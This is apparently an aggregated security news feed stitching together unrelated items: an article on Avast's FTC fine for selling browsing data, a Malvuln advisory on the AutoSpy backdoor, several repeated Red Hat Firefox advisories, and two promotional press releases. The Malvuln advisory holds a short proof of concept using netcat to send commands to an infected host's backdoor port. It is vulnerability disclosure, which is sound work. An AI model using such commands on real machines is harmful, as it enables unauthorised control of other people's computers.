By Deeba Ahmed
Avast Hit with $16.5 Million Fine, Settles with FTC Over Deceptive Data Practices, Forced to Delete User Information
This is a post from HackRead.com Read the original post: Avast Fined Millions for Selling User Browsing Data

Avast, a popular antivirus software, has been fined $16.5 million for selling user browsing data despite claims of protecting privacy. The FTC accused them of misleading users and selling sensitive information without consent. Avast agreed to settle, stop selling data, and delete user information.

The US Federal Trade Commission (FTC) has imposed a $16.5 million fine on Avast Limited, **Avast Software,** and Jumpshot for deceiving users by claiming its software would eliminate web tracking but doing the tracking itself.

It is worth noting that, the Prague, Czech Republic-based anti-malware and cybersecurity vendor stored the data indefinitely and sold it without consumers’ consent or notice while promising users exemplary privacy protection.

This development reflects the continuation of the FTC’s crackdown on companies involved in deceptive data privacy practices. In January 2024, it reached a **settlement** with Outlogic to prevent selling information for tracking user locations and **banned** InMarket from selling precise user locations.

The FTC’s Director of Consumer Protection, Samuel Levine, criticized Avast’s bait-and-switch surveillance tactics for violating consumer privacy.

In its complaint, available **here** (PDF), the FTC revealed that cybersecurity software company Avast collected consumers’ browsing information through its browser extensions and antivirus software, including Avast Extensions, Avast Secure Browser, Avast Mobile Software, and Avast Desktop Software. The FTC accused Avast of selling its data to over 100 third parties via Jumpshot.

For your information, in 2013, Avast acquired competitor Jumpshot, rebranded as an analytics company, and sold browsing information collected from consumers from 2014 to 2020 through it. The FTC accused Jumpshot of offering products that enabled user tracking and associating browsing histories with third-party information.

Jumpshot entered a contract with Omnicom, offering an “All Clicks Feed” for 50% of customers in the US, UK, Mexico, Australia, Canada, and Germany, and earned millions in gross revenues. Avast’s dubious data privacy practices were exposed in 2020 in a joint investigation, leading to the **shutdown of Jumpshot**.

Reportedly, the company collected data on religious beliefs, health concerns, political views, locations, and financial status from 2014 to 2020. The FTC found Avast failed to adequately anonymize browsing information despite the company claiming otherwise.

FTC also discovered that Avast sold data with unique identifiers for each browser, which exposed crucial data like visited websites, timestamps, user location, and the type of device and browser.

Avast agreed to settle the case with the FTC, paying $16.5 million. The order also requires Avast to stop selling or licensing browsing data to advertisers, delete all data obtained by Jumpshot, and notify affected customers of the sale.

How Jumpshot functioned

Avast’s spokesperson, Jeff Monney, reaffirmed the company’s commitment to protecting and empowering users’ digital lives, citing disagreement on the allegations while opting for a settlement.

Data privacy violations can lead to significant financial consequences for companies like Avast, including fines, lawsuits, lost business, reputational damage, and negative press coverage. Regulatory bodies enforce data privacy laws and can sue companies, resulting in further financial losses and legal costs, as evident in Avast’s case.

****RELATED ARTICLES****

1.  **HelloFresh Fined £140,000 for 80 Million Spam Messages**
2.  **Unreleased Music Stolen and Sold on Dark Web: Hacker Fined**
3.  **Google Incognito Mode: New Disclaimer Reveals Data Tracking**
4.  **Meta Fined €265 million in Facebook Data Scraping Case in the EU**
5.  **Sephora Fined $1.2 Million for Breaching CCPA and Selling User Data**
6.  **Apple and Samsung fined millions for slowing down old smartphones**

Avast Fined Millions for Selling User Browsing Data

Backdoor.Win32.AutoSpy.10 malware suffers from a remote command execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/b012704cad2bae6edbd23135394b9127.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.AutoSpy.10Vulnerability: Unauthenticated Remote Command ExecutionDescription: The malware listens on TCP port 1008. Third party adversaries who can reach an infected host can issue various commands made available by the backdoor. Command "startapp" will run programs, "msgbox" will send a popup box to message the victim. The "hangup victim" cmd will cause infinite notepad.exe processes to open on the affected machine. Other commands avail are "info tick" which returns system information, "kill" [file] etc.Family: AutoSpyType: PE32MD5: b012704cad2bae6edbd23135394b9127Vuln ID: MVID-2024-0671Disclosure: 02/24/2024Exploit/PoC:C:\sec>nc64.exe x.x.x.x 1008startapp "c:\Windows\System32\mspaint.exe"Application started...startapp "c:\Windows\System32\calc.exe"Application started...msgbox hateMessagebox shown...info tickProduct Name       :Product ID         :Product Type       :User Organization  :User Name          :System Root        :Version            :Version Number     :Sub Version Number :Computer Name      : DESKTOP-2C4IJHOTime Zone          : @tzres.dll,-112Network Logon      :beep BeepBeep send...hangup victimDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.AutoSpy.10 MVID-2024-0671 Remote Command Execution

Red Hat Security Advisory 2024-0976-03 - An update for firefox is now available for Red Hat Enterprise Linux 7. Issues addressed include a spoofing vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0976.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2024:0976-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0976  
Issue date:         2024-02-26  
Revision:           03  
CVE Names:          CVE-2024-1546  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.8.0 ESR.

Security Fix(es):

* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)

* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)

* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)

* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)

* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)

* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)

* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)

* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-1546

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2265349  
https://bugzilla.redhat.com/show_bug.cgi?id=2265350  
https://bugzilla.redhat.com/show_bug.cgi?id=2265351  
https://bugzilla.redhat.com/show_bug.cgi?id=2265352  
https://bugzilla.redhat.com/show_bug.cgi?id=2265353  
https://bugzilla.redhat.com/show_bug.cgi?id=2265354  
https://bugzilla.redhat.com/show_bug.cgi?id=2265355  
https://bugzilla.redhat.com/show_bug.cgi?id=2265356

Red Hat Security Advisory 2024-0976-03

Red Hat Security Advisory 2024-0972-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions. Issues addressed include a spoofing vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0972.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2024:0972-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0972  
Issue date:         2024-02-26  
Revision:           03  
CVE Names:          CVE-2024-1546  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.8.0 ESR.

Security Fix(es):

* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)

* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)

* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)

* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)

* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)

* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)

* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)

* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-1546

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2265349  
https://bugzilla.redhat.com/show_bug.cgi?id=2265350  
https://bugzilla.redhat.com/show_bug.cgi?id=2265351  
https://bugzilla.redhat.com/show_bug.cgi?id=2265352  
https://bugzilla.redhat.com/show_bug.cgi?id=2265353  
https://bugzilla.redhat.com/show_bug.cgi?id=2265354  
https://bugzilla.redhat.com/show_bug.cgi?id=2265355  
https://bugzilla.redhat.com/show_bug.cgi?id=2265356

Red Hat Security Advisory 2024-0972-03

Red Hat Security Advisory 2024-0971-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include a spoofing vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0971.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2024:0971-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0971  
Issue date:         2024-02-26  
Revision:           03  
CVE Names:          CVE-2024-1546  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.8.0 ESR.

Security Fix(es):

* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)

* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)

* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)

* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)

* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)

* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)

* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)

* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-1546

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2265349  
https://bugzilla.redhat.com/show_bug.cgi?id=2265350  
https://bugzilla.redhat.com/show_bug.cgi?id=2265351  
https://bugzilla.redhat.com/show_bug.cgi?id=2265352  
https://bugzilla.redhat.com/show_bug.cgi?id=2265353  
https://bugzilla.redhat.com/show_bug.cgi?id=2265354  
https://bugzilla.redhat.com/show_bug.cgi?id=2265355  
https://bugzilla.redhat.com/show_bug.cgi?id=2265356

Red Hat Security Advisory 2024-0971-03

Red Hat Security Advisory 2024-0970-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include a spoofing vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0970.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2024:0970-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0970  
Issue date:         2024-02-26  
Revision:           03  
CVE Names:          CVE-2024-1546  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.8.0 ESR.

Security Fix(es):

* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)

* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)

* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)

* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)

* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)

* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)

* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)

* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-1546

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2265349  
https://bugzilla.redhat.com/show_bug.cgi?id=2265350  
https://bugzilla.redhat.com/show_bug.cgi?id=2265351  
https://bugzilla.redhat.com/show_bug.cgi?id=2265352  
https://bugzilla.redhat.com/show_bug.cgi?id=2265353  
https://bugzilla.redhat.com/show_bug.cgi?id=2265354  
https://bugzilla.redhat.com/show_bug.cgi?id=2265355  
https://bugzilla.redhat.com/show_bug.cgi?id=2265356

Red Hat Security Advisory 2024-0970-03

Red Hat Security Advisory 2024-0969-03 - An update for firefox is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include a spoofing vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0969.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2024:0969-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0969  
Issue date:         2024-02-26  
Revision:           03  
CVE Names:          CVE-2024-1546  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.8.0 ESR.

Security Fix(es):

* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)

* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)

* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)

* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)

* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)

* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)

* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)

* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-1546

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2265349  
https://bugzilla.redhat.com/show_bug.cgi?id=2265350  
https://bugzilla.redhat.com/show_bug.cgi?id=2265351  
https://bugzilla.redhat.com/show_bug.cgi?id=2265352  
https://bugzilla.redhat.com/show_bug.cgi?id=2265353  
https://bugzilla.redhat.com/show_bug.cgi?id=2265354  
https://bugzilla.redhat.com/show_bug.cgi?id=2265355  
https://bugzilla.redhat.com/show_bug.cgi?id=2265356

Red Hat Security Advisory 2024-0969-03

Red Hat Security Advisory 2024-0968-03 - An update for firefox is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Issues addressed include a spoofing vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0968.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2024:0968-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0968  
Issue date:         2024-02-26  
Revision:           03  
CVE Names:          CVE-2024-1546  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.8.0 ESR.

Security Fix(es):

* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)

* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)

* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)

* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)

* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)

* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)

* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)

* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-1546

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2265349  
https://bugzilla.redhat.com/show_bug.cgi?id=2265350  
https://bugzilla.redhat.com/show_bug.cgi?id=2265351  
https://bugzilla.redhat.com/show_bug.cgi?id=2265352  
https://bugzilla.redhat.com/show_bug.cgi?id=2265353  
https://bugzilla.redhat.com/show_bug.cgi?id=2265354  
https://bugzilla.redhat.com/show_bug.cgi?id=2265355  
https://bugzilla.redhat.com/show_bug.cgi?id=2265356

Red Hat Security Advisory 2024-0968-03

By Owais Sultan
British Virgin Islands, 26 February 2024 – Friendzone, the sustainable and scalable Web3 platform redefining Social Finance (SocialFi)…
This is a post from HackRead.com Read the original post: Friendzone Launches Social Monetization on Polygon PoS for 5,000+ Waitlisted Users

**_British Virgin Islands, 26 February 2024_** – Friendzone, the sustainable and scalable Web3 platform redefining Social Finance (SocialFi) on the blockchain, has officially launched on the Polygon Proof-of-Stake network. The launch of the Social Capital Marketplace is the first of many key milestones for Friendzone in its mission to become the number #1 social media **dApp** in the Web3 industry. 

Friendzone is an entirely novel decentralized protocol that marries the engagement of traditional social media with the unique financial rewards enabled by **Web3 technology**, paving the way for the creation of more empowering online communities. In this way, Friendzone is much more than just another SocialFi platform.

It represents a paradigm shift that not only recognizes social media presence and influence but rewards it in tangible and monetizable ways. It promises to redefine the social media industry as a place where every interaction can potentially generate value, empowering content creators and users alike to monetize their online experiences seamlessly. 

The launch on Polygon PoS coincides with the closure of a significant funding round led by angel investors including Kain Warwick (Founder of Synthetix), Kieran Warwick (Founder of Illuvium), Danny Wilson (CFO of Illuvium), Thomas Aslanian (Product & Token Lead of Immutable), Anton Buenavista (Founding Team Pendle Finance), Jackson Chan (Co-Founder of PHD Capital) and many other incredible angels with experience at Synthetix, Pendle Finance, Bybit, Metastreet Labs and Renzo Protocol.

Alongside the round, which brings Friendzone’s total amount raised to more than USD 750,000, the startup is pleased to welcome the aforementioned investors, plus TN Lee (Co-Founder of Pendle Finance) and John Park (Partner at Sparklabs) to its growing advisory board. 

Although Friendzone is competing in an increasingly crowded SocialFi space, its platform is differentiated from others through its nuanced incentive and protocol design. Friendzone is uniquely focused on overcoming the scalability and liquidity challenges that have hampered the growth of first-generation SocialFi platforms, setting it up to become the first protocol of its kind to go mainstream. 

Friendzone has designed its protocol economics around an adaptive bonding curve that takes into account market feedback in real-time, ensuring that its token valuation is always fair, with continuous access for both small and large networks. Through this mechanism, it promotes sustained engagement and network growth without being constrained by the accessibility and liquidity bottlenecks that have held back alternative SocialFi protocols. 

With its custom creator controls, Friendzone empowers everyone to be a creator with the ability to customize their social media activity and create tailored offerings ranging from public events to private groups, where they can set terms and prices that better reflect the value they provide.

Besides the purchase and sale of its “Creator Chips”, Friendzone incorporates a staking feature into its tokenomics model that takes into account both the quantity and duration of the user’s stake. It’s inspired by Curve’s veCRV model and aims to ensure a more equitable distribution of each creator’s revenue, incentivizing network users to actively contribute to the success of every creator with a share of their rewards. 

Through these novel innovations, Friendzone promises to transcend the emotional incentives of traditional social media networks by integrating powerful financial incentives enabled only with crypto, amplifying its network effects to enhance user engagement and fairly reward participation on the platform and all integrated decentralized applications existing today. 

****A Progressive Rollout****

Friendzone has generated enormous interest before its launch on Polygon PoS, with more than 5,000 whitelisted users signed up. To ensure stability during its incentivized beta rollout, the protocol is capping the number of users allowed onto the network in batches of 1000. The plan is to progressively onboard more users as the project demonstrates its worth and evolves from its beta stage, where it will be closely monitored for bugs and refined to provide an optimal user experience. 

The initial 1000 users selected to participate in the launch can now head to X, formerly known as Twitter, to claim their Friendzone handles, which will be the same as their X handles.

During the initial launch period, Friendzone will also integrate a new points system into its protocol, enabling early adopters who beta test the product to begin accumulating points to enhance their rewards and reputations on the platform. 

“We are immensely proud to launch Friendzone with the support of the Polygon ecosystem, a collaboration that marks a significant milestone in our journey. The Polygon PoS Network’s exceptional scalability, speed, and security offer the perfect foundation for Friendzone, enabling us to redefine social media engagement and monetization in the Web3 space.

The commitment to innovation and the success of projects built on Polygon PoS is unparalleled. This strategic relationship is a testament to our shared vision of empowering users and creators in a disruptive decentralized digital economy.” said Kevin Lu, CEO & Co-Founder of Friendzone.

Friendzone is delighted to bring its collaboration with the Polygon ecosystem to the next level, tapping into its powerful ecosystem and leveraging its expertise to explore new use cases and accelerate innovation in the SocialFi space. Friendzone is poised to unleash new dynamics and explore uncharted waters on Polygon PoS as it seeks to bring more value to users in the nascent decentralized social media industry. 

The Polygon ecosystem has already distinguished itself in the blockchain arena with its strong ethos of innovation and a litany of unparalleled strategic brand collaborations, making it an ideal landing spot for Friendzone. The protocol’s integration with the Polygon network enables it to make plans toward tapping into an innovative zkEVM-based Layer-2 architecture that will be instrumental in accelerating its growth as it scales its network and expands its user base.

The Polygon networks are home to some of the most dynamic and diverse ecosystems of groundbreaking dApps and communities in the blockchain world, providing further opportunities to collaborate, innovate and bring SocialFi into the mainstream. 

“Friendzone represents the first of its kind in the SocialFi space, pioneering a new era of social media that rewards engagement with real value. We are proud to have Friendzone build on Polygon PoS and to work closely with their team to achieve our mutual goals. Their innovative approach to integrating social interactions with value incentives sets a new standard in the industry. This collaboration underscores Polygon’s dedication to supporting groundbreaking projects that push the boundaries of what’s possible in Web3 and beyond.” said SungMo Park, Head of BD APAC at Polygon Labs.

Today’s launch and funding round represents the first of many milestones to come for Friendzone, laying the groundwork for a truly interoperable protocol that will provide a scalable foundation to support the monetization layer of on-chain social graphs. 

****About Friendzone****

Friendzone is the premier social Web3 platform introducing real-time adaptive pricing and native reward distribution to ensure fair and dynamic value exchange, tailored to a creator’s reputation and community support. The platform is the first to incentivize sustained engagement and offers creators extensive control over content monetization, promoting a robust and inclusive digital circular economy at scale.

Friendzone is supported by a dedicated team of core contributors and advisors from industry-leading entities such as Synthetix, Band Protocol, Koinly, Immutable, Pendle Finance, Cyball, and Sparklabs.

1.  **GAM3S.GG Raises $2M to Grow Web3 Gaming Superapp**
2.  **Particle Network’s Intent-Centric Approach Aims and Secure Web3**
3.  **Web3 Needs A Decentralized Infrastructure That IPFS Cannot Deliver**
4.  **Signal21 Beta Launch Bridges Gap in Blockchain Intelligence Services**
5.  **READYgg Gets Web2 Players into Web3 in Partnership with Aptos Labs**

Friendzone Launches Social Monetization on Polygon PoS for 5,000+ Waitlisted Users

By cyberwire
Brea, California, February 26th, 2024, Cyberwire – The current large surge in cyber threats has left many organizations…
This is a post from HackRead.com Read the original post: ThreatHunter.ai Halts 100s of Attacks: Battling Ransomware & Nation-State Cyber Threats

**Brea, California, February 26th, 2024, Cyberwire** – The current large surge in cyber threats has left many organizations grappling for security so ThreatHunter.ai is taking decisive action. Recognizing the critical juncture at which the digital world stands, ThreatHunter.ai is now offering its cutting-edge cybersecurity services free of charge to all organizations for 30 days, irrespective of their current cybersecurity measures. 

James McMurry, Founder of ThreatHunter.ai, reflects on the situation’s urgency: “In the past 48 hours alone, we have stopped hundreds of actual attacks and performed mitigations for our customers. Yet, the frequency and sophistication of these attacks are escalating at an alarming rate. Our mission is clear: to extend our protective reach to every organization in need, ensuring that the digital frontier is safe for all.”

Drawing on recent events and the resilient nature of cyber threats, as highlighted in an insightful piece on the LockBit ransomware saga, it’s evident that the cybersecurity landscape is more volatile than ever. The LockBit group’s audacity in bouncing back after a significant takedown operation underlines the persistent and evolving threat posed by cybercriminals. 

ThreatHunter.ai, with its elite team of threat hunters, engineers, and cybersecurity experts, employs the ARGOS platform to provide real-time threat detection and mitigation. Our AI and ML-driven technologies have been pivotal in safeguarding organizations from the ever-evolving tactics of cyber adversaries.

“We see the problem getting larger, with cyber threats becoming more sophisticated by the day. Offering our services for free for 30 days is our way of bolstering the defences of organizations across the globe. It’s a call to action for everyone, and to show that ThreatHunter.ai is much more than all the MDRs offering automated alerts, we actually will stop threats, and how our team operates as part of our customers’ cyber team,” McMurry emphasizes.

This initiative is not just about offering a temporary solution; it’s about raising awareness and driving home the point that in the face of rising cyber threats, complacency is not an option.

Organizations interested in taking advantage of ThreatHunter.ai’s complimentary 30-day services are encouraged to reach out immediately. Together, we can turn the tide against the cyber threats that loom large over our connected world.

****About ThreatHunter.ai****

ThreatHunter.ai is at the forefront of cybersecurity, specializing in real-time detection, analysis, and mitigation of cyber threats. Powered by the innovative ARGOS platform, our approach combines advanced AI and ML technologies with the expertise of the industry’s most skilled professionals. We are dedicated to defending the digital infrastructure against the complex landscape of cyber threats, ensuring peace of mind for businesses and governments worldwide.

ThreatHunter.ai, a 100% Service-Disabled Veteran Owned Small Business, is a leading provider of AI-driven threat-hunting solutions. Its advanced machine learning algorithms and expert analysis help organizations detect, identify, and respond to cyber threats. Its solutions are designed to supplement existing security resources and provide a fresh perspective on how to address today’s complex cyber threats.

